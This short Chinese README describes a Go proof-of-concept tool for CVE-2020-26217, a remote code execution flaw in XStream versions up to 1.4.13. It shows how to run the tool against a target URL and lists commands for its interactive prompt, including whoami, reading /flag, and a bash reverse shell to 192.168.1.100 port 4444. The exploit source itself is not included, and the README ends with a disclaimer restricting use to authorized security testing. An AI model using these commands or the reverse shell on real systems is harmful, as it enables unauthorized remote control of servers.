XStream 远程代码执行漏洞利用工具。
CVE-2020-26217 是 XStream 库中的一个反序列化漏洞,攻击者可以通过构造恶意的 XML 数据触发远程代码执行。
影响版本:XStream <= 1.4.13
go run poc.go <目标URL>
# 运行工具
go run poc.go http://target.com:8080/?data
# 进入交互模式后输入命令
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
go build -o poc poc.go
本工具仅供安全研究和授权测试使用,请勿用于非法用途。使用者需自行承担相关法律责任。